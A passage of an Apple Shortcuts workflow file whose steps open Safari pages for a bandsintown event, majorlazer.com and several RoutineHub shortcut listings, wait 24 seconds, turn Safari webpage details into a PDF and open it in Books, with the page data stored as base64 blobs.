				dG1fbWVkaXVtPXdlYiZ1dG1fc291cmNlPXdpZGdldNJQ
				UV5fVU5TVVJMol5UXxAdTlNVc2VyQWN0aXZpdHlUeXBl
				QnJvd3NpbmdXZWLSYiRjZFdOUy50aW1lI0HBYuDmQIZ7
				gArSUFFmZ1ZOU0RhdGWiZlTSaSRqa1dOUy5kYXRhTxED
				e2JwbGlzdDAw1AECAwQFBgcKWCR2ZXJzaW9uWSRhcmNo
				aXZlclQkdG9wWCRvYmplY3RzEgABhqBfEA9OU0tleWVk
				QXJjaGl2ZXLRCAlUcm9vdIABpAsMERJVJG51bGzSDQ4P
				EFljb250YWluZXJWJGNsYXNzgAKAA08RAkreugABAABK
				AgAA1QEAAB0AAADw1QEAAAAA1QEAALQBAAADAKkBAAAl
				AAAAX19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0cmli
				dXRlU2V0AHIBAAAFADkBAAAHAA8AAABwdWJsaWMuY29u
				dGVudAAWAQAA//4OIGIAYQBuAGQAcwBpAG4AdABvAHcA
				bgAuAGMAbwBtAC8AZQAvADEAMAAxADEAMwA0ADAAMQA5
				AD8AYQBmAGYAaQBsAF8AYwBvAGQAZQA9AGoAcwBfAGQA
				aQBwAGwAbwAuAGMAbwBtACYAYQBwAHAAXwBpAGQAPQBq
				AHMAXwBkAGkAcABsAG8ALgBjAG8AbQAmAGMAYQBtAGUA
				XwBmAHIAbwBtAD0AMgA0ADIAJgB1AHQAbQBfAGMAYQBt
				AHAAYQBpAGcAbgA9AGUAdgBlAG4AdAAmAHUAdABtAF8A
				bQBlAGQAaQB1AG0APQB3AGUAYgAmAHUAdABtAF8AcwBv
				AHUAcgBjAGUAPQB3AGkAZABnAGUAdAAAAAAAAQADAAMA
				AwADAAUAFgAAAFwAAAD0VAAAAAAAAADgPwAAAG8AAAD1
				KwAAAAAAAADgAAAAAAAAAADgJwAAAPQAAAAA4lAAAADx
				EwBrTURJdGVtVGh1bWJuYWlsVVJMABIAa01ESXRlbUNv
				bnRlbnRUeXBlABEAa01ESXRlbUNvbnRlbnRVUkwAEgBr
				TURJdGVtRGVzY3JpcHRpb24AHgBrTURJdGVtUmVsYXRl
				ZFVuaXF1ZUlkZW50aWZpZXIA0hMUFRZaJGNsYXNzbmFt
				ZVgkY2xhc3Nlc18QHENTU2VhcmNoYWJsZUl0ZW1BdHRy
				aWJ1dGVTZXSiFxhfEBxDU1NlYXJjaGFibGVJdGVtQXR0
				cmlidXRlU2V0WE5TT2JqZWN0AAgAEQAaACQAKQAyADcA
				SQBMAFEAUwBYAF4AYwBtAHQAdgB4AsYCywLWAt8C/gMB
				AyAAAAAAAAACAQAAAAAAAAAZAAAAAAAAAAAAAAAAAAAD
				KYAM0lBRbW5dTlNNdXRhYmxlRGF0YaNvcFRdTlNNdXRh
				YmxlRGF0YVZOU0RhdGHTSkskcnR2oXOADqF1gA+AEF8Q
				GlVBSW50ZW50c0lkZW50aWZpZXJQYXlsb2FkTxCwYnBs
				aXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVy
				VCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRBcmNo
				aXZlctEICVRyb290gAGiCwxVJG51bGxfECQ0MzZGMTFB
				RC1DMzJCLTRFOTctQTI3MS0xQTJEQkREOEZEQTYIERok
				KTI3SUxRU1ZcAAAAAAAAAQEAAAAAAAAADQAAAAAAAAAA
				AAAAAAAAAIPSUFF6e18QE05TTXV0YWJsZURpY3Rpb25h
				cnmjelJU0kskfX6ggBLSUFGAgVVOU1NldKKAVNJQUYOE
				XxASVUFVc2VyQWN0aXZpdHlJbmZvooVUXxASVUFVc2Vy
				QWN0aXZpdHlJbmZvAAgAEQAaACQAKQAyADcASQBMAFEA
				UwBqAHAArwC8AMIAzQDjAPoBAgEeATYBSQFYAWUBagFz
				AYABmgGiAasBugG/AdQB6wH3AhECGAInAjICNwJFAk4C
				YgJkAmYCaAJqAmwCbgJvAnACcgJ0AnYCeAJ6AnwCfgKA
				AoECgwKFAoYChwKJAosCjQKPApECkwKVApcCmAKfAqcC
				sgKzArQCtgK7AsYCzwLcAt8C6AMjAyoDMgM+A0ADQgNE
				A9wD4QPnA+oECgQPBBcEIAQiBCcELgQxBDYEPge9B78H
				xAfSB9YH5AfrB/IH9Af2B/gH+gf8CBkIzAjRCOcI6wjw
				CPEI8wj4CP4JAQkGCRsJHgAAAAAAAAIBAAAAAAAAAIYA
				AAAAAAAAAAAAAAAAAAkz
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎bandsintown.com/e/101134019?affil_code=js_diplo.com&amp;app_id=js_diplo.com&amp;came_from=242&amp;utm_campaign=event&amp;utm_medium=web&amp;utm_source=widget</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0W01ham9yIExhemVy01ck
				WC5aW1dOUy5iYXNlW05TLnJlbGF0aXZlgACAB4AGXxAX
				aHR0cHM6Ly9tYWpvcmxhemVyLmNvbS/SUFFeX1VOU1VS
				TKJeVF8QHU5TVXNlckFjdGl2aXR5VHlwZUJyb3dzaW5n
				V2Vi0mIkY2RXTlMudGltZSNBwWLg5kCb+oAK0lBRZmdW
				TlNEYXRlomZU0mkkamtXTlMuZGF0YU8RAoVicGxpc3Qw
				MNQBAgMEBQYHClgkdmVyc2lvblkkYXJjaGl2ZXJUJHRv
				cFgkb2JqZWN0cxIAAYagXxAPTlNLZXllZEFyY2hpdmVy
				0QgJVHJvb3SAAaQLDBESVSRudWxs0g0ODxBZY29udGFp
				bmVyViRjbGFzc4ACgANPEQFU3roAAQAAVAEAAN8AAAAd
				AAAA8N8AAAAAAN8AAAC+AAAAAwCzAAAAJQAAAF9fY2xh
				c3M6Q1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNldAB8
				AAAABQBDAAAABwAPAAAAcHVibGljLmNvbnRlbnQAIAAA
				AP/+DiBtAGEAagBvAHIAbABhAHoAZQByAC4AYwBvAG0A
				AAAAAAEAAwADAAMAAwAFABYAAABcAAAA9FQAAAAAAAAA
				4D8AAABvAAAA9SsAAAAAAAAA4AAAAAAAAAAA4CcAAAD0
				AAAAAOJQAAAA8RMAa01ESXRlbVRodW1ibmFpbFVSTAAS
				AGtNREl0ZW1Db250ZW50VHlwZQARAGtNREl0ZW1Db250
				ZW50VVJMABIAa01ESXRlbURlc2NyaXB0aW9uAB4Aa01E
				SXRlbVJlbGF0ZWRVbmlxdWVJZGVudGlmaWVyANITFBUW
				WiRjbGFzc25hbWVYJGNsYXNzZXNfEBxDU1NlYXJjaGFi
				bGVJdGVtQXR0cmlidXRlU2V0ohcYXxAcQ1NTZWFyY2hh
				YmxlSXRlbUF0dHJpYnV0ZVNldFhOU09iamVjdAAIABEA
				GgAkACkAMgA3AEkATABRAFMAWABeAGMAbQB0AHYAeAHQ
				AdUB4AHpAggCCwIqAAAAAAAAAgEAAAAAAAAAGQAAAAAA
				AAAAAAAAAAAAAjOADNJQUW1uXU5TTXV0YWJsZURhdGGj
				b3BUXU5TTXV0YWJsZURhdGFWTlNEYXRh00pLJHJ0dqFz
				gA6hdYAPgBBfEBpVQUludGVudHNJZGVudGlmaWVyUGF5
				bG9hZE8QsGJwbGlzdDAw1AECAwQFBgcKWCR2ZXJzaW9u
				WSRhcmNoaXZlclQkdG9wWCRvYmplY3RzEgABhqBfEA9O
				U0tleWVkQXJjaGl2ZXLRCAlUcm9vdIABogsMVSRudWxs
				XxAkMzBFOTNENjAtNzIwOS00M0MzLUI0QTQtRDQwQjNF
				MTNFNDNFCBEaJCkyN0lMUVNWXAAAAAAAAAEBAAAAAAAA
				AA0AAAAAAAAAAAAAAAAAAACD0lBRentfEBNOU011dGFi
				bGVEaWN0aW9uYXJ5o3pSVNJLJH1+oIAS0lBRgIFVTlNT
				ZXSigFTSUFGDhF8QElVBVXNlckFjdGl2aXR5SW5mb6KF
				VF8QElVBVXNlckFjdGl2aXR5SW5mbwAIABEAGgAkACkA
				MgA3AEkATABRAFMAagBwAK8AvADCAM0A4wD6AQIBHgE2
				AUkBWAFlAWoBcwGAAZoBogGrAboBvwHUAesB9wIRAhgC
				JwIyAjcCRQJOAmICZAJmAmgCagJsAm4CbwJwAnICdAJ2
				AngCegJ8An4CgAKBAoMChQKGAocCiQKLAo0CjwKRApMC
				lQKXApgCnwKnArICswK0ArYCuwLGAs8C3ALfAugC9AL7
				AwMDDwMRAxMDFQMvAzQDOgM9A10DYgNqA3MDdQN6A4ED
				hAOJA5EGGgYcBiEGLwYzBkEGSAZPBlEGUwZVBlcGWQZ2
				BykHLgdEB0gHTQdOB1AHVQdbB14HYwd4B3sAAAAAAAAC
				AQAAAAAAAACGAAAAAAAAAAAAAAAAAAAHkA==
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎majorlazer.com</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.properties.safariwebpage</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>5B1FE745-378B-45D9-8CD4-78B2967C0322</string>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>Component of URL</string>
						<key>OutputUUID</key>
						<string>C6DACAE8-8440-4DEA-A9E9-279E3933F81B</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0bxAiAFIAbwB1AHQAaQBu
				AGUASAB1AGIAICAiACAARABvAHcAbgBsAG8AYQBkACAA
				UwB5AHMAdABlAG0AIABGAGkAbABlAHPTVyRYLlpbV05T
				LmJhc2VbTlMucmVsYXRpdmWAAIAHgAZfECNodHRwczov
				L3JvdXRpbmVodWIuY28vc2hvcnRjdXQvMzE4ONJQUV5f
				VU5TVVJMol5UXxAdTlNVc2VyQWN0aXZpdHlUeXBlQnJv
				d3NpbmdXZWLSYiRjZFdOUy50aW1lI0HBbg3vMsKDgArS
				UFFmZ1ZOU0RhdGWiZlTSaSRqa1dOUy5kYXRhTxECn2Jw
				bGlzdDAw1AECAwQFBgcKWCR2ZXJzaW9uWSRhcmNoaXZl
				clQkdG9wWCRvYmplY3RzEgABhqBfEA9OU0tleWVkQXJj
				aGl2ZXLRCAlUcm9vdIABpAsMERJVJG51bGzSDQ4PEFlj
				b250YWluZXJWJGNsYXNzgAKAA08RAW7eugABAABuAQAA
				+QAAAB0AAADw+QAAAAAA+QAAANgAAAADAM0AAAAlAAAA
				X19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRl
				U2V0AJYAAAAFAF0AAAAHAA8AAABwdWJsaWMuY29udGVu
				dAA6AAAA//4OIHIAbwB1AHQAaQBuAGUAaAB1AGIALgBj
				AG8ALwBzAGgAbwByAHQAYwB1AHQALwAzADEAOAA4AAAA
				AAABAAMAAwADAAMABQAWAAAAXAAAAPRUAAAAAAAAAOA/
				AAAAbwAAAPUrAAAAAAAAAOAAAAAAAAAAAOAnAAAA9AAA
				AADiUAAAAPETAGtNREl0ZW1UaHVtYm5haWxVUkwAEgBr
				TURJdGVtQ29udGVudFR5cGUAEQBrTURJdGVtQ29udGVu
				dFVSTAASAGtNREl0ZW1EZXNjcmlwdGlvbgAeAGtNREl0
				ZW1SZWxhdGVkVW5pcXVlSWRlbnRpZmllcgDSExQVFlok
				Y2xhc3NuYW1lWCRjbGFzc2VzXxAcQ1NTZWFyY2hhYmxl
				SXRlbUF0dHJpYnV0ZVNldKIXGF8QHENTU2VhcmNoYWJs
				ZUl0ZW1BdHRyaWJ1dGVTZXRYTlNPYmplY3QACAARABoA
				JAApADIANwBJAEwAUQBTAFgAXgBjAG0AdAB2AHgB6gHv
				AfoCAwIiAiUCRAAAAAAAAAIBAAAAAAAAABkAAAAAAAAA
				AAAAAAAAAAJNgAzSUFFtbl1OU011dGFibGVEYXRho29w
				VF1OU011dGFibGVEYXRhVk5TRGF0YdNKSyRydHahc4AO
				oXWAD4AQXxAaVUFJbnRlbnRzSWRlbnRpZmllclBheWxv
				YWRPELBicGxpc3QwMNQBAgMEBQYHClgkdmVyc2lvblkk
				YXJjaGl2ZXJUJHRvcFgkb2JqZWN0cxIAAYagXxAPTlNL
				ZXllZEFyY2hpdmVy0QgJVHJvb3SAAaILDFUkbnVsbF8Q
				JEE3NkI3NkY2LTE5MDUtNDRDOC05QUEzLUM1ODkwMzFD
				MzFCOQgRGiQpMjdJTFFTVlwAAAAAAAABAQAAAAAAAAAN
				AAAAAAAAAAAAAAAAAAAAg9JQUXp7XxATTlNNdXRhYmxl
				RGljdGlvbmFyeaN6UlTSSyR9fqCAEtJQUYCBVU5TU2V0
				ooBU0lBRg4RfEBJVQVVzZXJBY3Rpdml0eUluZm+ihVRf
				EBJVQVVzZXJBY3Rpdml0eUluZm8ACAARABoAJAApADIA
				NwBJAEwAUQBTAGoAcACvALwAwgDNAOMA+gECAR4BNgFJ
				AVgBZQFqAXMBgAGaAaIBqwG6Ab8B1AHrAfcCEQIYAicC
				MgI3AkUCTgJiAmQCZgJoAmoCbAJuAm8CcAJyAnQCdgJ4
				AnoCfAJ+AoACgQKDAoUChgKHAokCiwKNAo8CkQKTApUC
				lwKYAp8CpwKyArMCtAK2ArsCxgLPAtwC3wLoAy8DNgM+
				A0oDTANOA1ADdgN7A4EDhAOkA6kDsQO6A7wDwQPIA8sD
				0APYBnsGfQaCBpAGlAaiBqkGsAayBrQGtga4BroG1weK
				B48HpQepB64HrwexB7YHvAe/B8QH2QfcAAAAAAAAAgEA
				AAAAAAAAhgAAAAAAAAAAAAAAAAAAB/E=
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎routinehub.co/shortcut/3188</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.delay</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFDelayTime</key>
				<real>24</real>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJicjKSMjIy0nLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggJgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3RvEB0AUgBv
				AHUAdABpAG4AZQBIAHUAYgAgICIAIABQAGEAcwBzAHcA
				bwByAGQAIABNAGEAbgBhAGcAZQBy00USRiNISVdOUy5i
				YXNlW05TLnJlbGF0aXZlgACAB4AGXxAjaHR0cHM6Ly9y
				b3V0aW5laHViLmNvL3Nob3J0Y3V0LzI0NTLSPj9MTVVO
				U1VSTKJMQl8QHU5TVXNlckFjdGl2aXR5VHlwZUJyb3dz
				aW5nV2Vi0lASUVJXTlMuZGF0YU8RArRicGxpc3QwMNQB
				AgMEBQYVFlgkdmVyc2lvblgkb2JqZWN0c1kkYXJjaGl2
				ZXJUJHRvcBIAAYagpAcIDQ5VJG51bGzSCQoLDFljb250
				YWluZXJWJGNsYXNzgAKAA08RAYPeugABAACDAQAADgEA
				AB0AAADwDgEAAAAADgEAAO0AAAAEAN0AAAAlAAAAX19j
				bGFzczpDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRlU2V0
				AJYAAAAFAF0AAAAHAA8AAABwdWJsaWMuY29udGVudAA6
				AAAA//4OIHIAbwB1AHQAaQBuAGUAaAB1AGIALgBjAG8A
				LwBzAGgAbwByAHQAYwB1AHQALwAyADQANQAyAAAAAAAB
				AAMAAwADAAMABQAWAAAAXAAAAPRUAAAAAAAAAOA/AAAA
				bwAAAPUrAAAAAAAAAOAAAAAAAAAAAOAMAAAAAAAMAAAA
				AQAAAAAAJwAAAPQAAAAA4lAAAADx6gAAAPETAGtNREl0
				ZW1UaHVtYm5haWxVUkwAEgBrTURJdGVtQ29udGVudFR5
				cGUAEQBrTURJdGVtQ29udGVudFVSTAASAGtNREl0ZW1E
				ZXNjcmlwdGlvbgAeAGtNREl0ZW1SZWxhdGVkVW5pcXVl
				SWRlbnRpZmllcgDSDxARElokY2xhc3NuYW1lWCRjbGFz
				c2VzXxAcQ1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0ZVNl
				dKITFF8QHENTU2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVT
				ZXRYTlNPYmplY3RfEA9OU0tleWVkQXJjaGl2ZXLRFxhU
				cm9vdIABAAgAEQAaACMALQAyADcAPABCAEcAUQBYAFoA
				XAHjAegB8wH8AhsCHgI9AkYCWAJbAmAAAAAAAAACAQAA
				AAAAAAAZAAAAAAAAAAAAAAAAAAACYoAK0j4/VFVdTlNN
				dXRhYmxlRGF0YaNWV0JdTlNNdXRhYmxlRGF0YVZOU0Rh
				dGHSORJZWqCADNI+P1xdVU5TU2V0olxC0j4/X2BfEBJV
				QVVzZXJBY3Rpdml0eUluZm+iYUJfEBJVQVVzZXJBY3Rp
				dml0eUluZm9fEA9OU0tleWVkQXJjaGl2ZXLRZGVUcm9v
				dIABAAgAEQAaACMALQAyADcARgBMAH0AigCQAJsAsQDI
				ANAA7AEEARMBGgEnASwBNQFCAVcBXwF5AYgBjQGkAbAB
				vgHSAdQB1gHYAdoB3AHeAd8B4AHiAeQB5gHoAeoB7AHt
				Ae8B8QHzAfUB9gH4AfoB+wICAgoCFQIWAhcCGQIeAikC
				MgI/AkICSwKIAo8ClwKjAqUCpwKpAs8C1ALaAt0C/QMC
				AwoFwgXEBckF1wXbBekF8AX1BfYF+AX9BgMGBgYLBiAG
				IwY4BkoGTQZSAAAAAAAAAgEAAAAAAAAAZgAAAAAAAAAA
				AAAAAAAABlQ=
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.makepdf</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>47612C77-D0C8-4048-85C0-A8E5BBD52F4C</string>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>Details of Safari Webpage</string>
						<key>OutputUUID</key>
						<string>5B1FE745-378B-45D9-8CD4-78B2967C0322</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>com.apple.iBooks.openin</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>BooksInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>PDF</string>
						<key>OutputUUID</key>
						<string>47612C77-D0C8-4048-85C0-A8E5BBD52F4C</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0bxAaAFIAbwB1AHQAaQBu
				AGUASAB1AGIAICAiACAAaQBPAFMAIABTAGUAdAB1AHAA
				IABBAHAAcNNXJFguWltXTlMuYmFzZVtOUy5yZWxhdGl2
				ZYAAgAeABl8QI2h0dHBzOi8vcm91dGluZWh1Yi5jby9z
				aG9ydGN1dC8zNjQ40lBRXl9VTlNVUkyiXlRfEB1OU1Vz
				ZXJBY3Rpdml0eVR5cGVCcm93c2luZ1dlYtJiJGNkV05T
				LnRpbWUjQcGot64VyXmACtJQUWZnVk5TRGF0ZaJmVNJp
				JGprV05TLmRhdGFPEQLDYnBsaXN0MDDUAQIDBAUGBwpY
				JHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9iamVjdHMS
				AAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGk
				CwwRElUkbnVsbNINDg8QWWNvbnRhaW5lclYkY2xhc3OA
				AoADTxEBkt66AAEAAJIBAAAGAQAAHQAAAPAGAQAAAAAG
				AQAA5QAAAAMA2gAAACUAAABfX2NsYXNzOkNTU2VhcmNo
				YWJsZUl0ZW1BdHRyaWJ1dGVTZXQAowAAAAYAXQAAAAkA
				DwAAAHB1YmxpYy5jb250ZW50ADoAAAD//g4gcgBvAHUA
				dABpAG4AZQBoAHUAYgAuAGMAbwAvAHMAaABvAHIAdABj
				AHUAdAAvADMANgA0ADgAAAAAAAEAAgADAAQABAAEAAYA
				BgBrAAAAAAAAAOAAAAAAAAAAAOBUAAAAAAAAAOAWAAAA
				XAAAAPQ/AAAAbwAAAPUrAAAAAAAAAOAnAAAA9AAAAADi
				UAAAAPETAGtNREl0ZW1UaHVtYm5haWxVUkwAEgBrTURJ
				dGVtQ29udGVudFR5cGUAEQBrTURJdGVtQ29udGVudFVS
				TAASAGtNREl0ZW1EZXNjcmlwdGlvbgAUAGtNREl0ZW1U
				aHVtYm5haWxEYXRhAB4Aa01ESXRlbVJlbGF0ZWRVbmlx
				dWVJZGVudGlmaWVyANITFBUWWiRjbGFzc25hbWVYJGNs
				YXNzZXNfEBxDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRl
				U2V0ohcYXxAcQ1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0
				ZVNldFhOU09iamVjdAAIABEAGgAkACkAMgA3AEkATABR
				AFMAWABeAGMAbQB0AHYAeAIOAhMCHgInAkYCSQJoAAAA
				AAAAAgEAAAAAAAAAGQAAAAAAAAAAAAAAAAAAAnGADNJQ
				UW1uXU5TTXV0YWJsZURhdGGjb3BUXU5TTXV0YWJsZURh
				dGFWTlNEYXRh00pLJHJ0dqFzgA6hdYAPgBBfEBpVQUlu
				dGVudHNJZGVudGlmaWVyUGF5bG9hZE8QsGJwbGlzdDAw
